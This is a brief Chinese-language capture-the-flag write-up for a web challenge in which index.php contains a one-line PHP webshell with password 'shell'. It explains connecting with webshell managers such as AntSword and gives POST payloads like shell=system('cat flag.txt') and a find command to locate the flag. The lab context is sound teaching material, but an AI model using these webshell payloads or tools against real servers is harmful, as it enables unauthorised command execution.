ctf-攻防世界-web:webshell

ctf-攻防世界-web:webshell_第1张图片

 提示webshell在index.php里面,那就打开场景看看:

ctf-攻防世界-web:webshell_第2张图片

显然是一句话木马,密码为shell。

用菜刀或者蚁剑链接一句话,即可找到flag:

ctf-攻防世界-web:webshell_第3张图片

 ctf-攻防世界-web:webshell_第4张图片

3.也可以使用hackbar,使用post方式传递shell=system(ls)列出目录   shell=system('cat flag.txt'); 获得flag

shell = system(“find / -name ‘flag*’”);

ctf-攻防世界-web:webshell_第5张图片

 

蚁剑下载地址https://github.com/AntSwordProject/antSword/releases

你可能感兴趣的:(#,web,shell,unctf)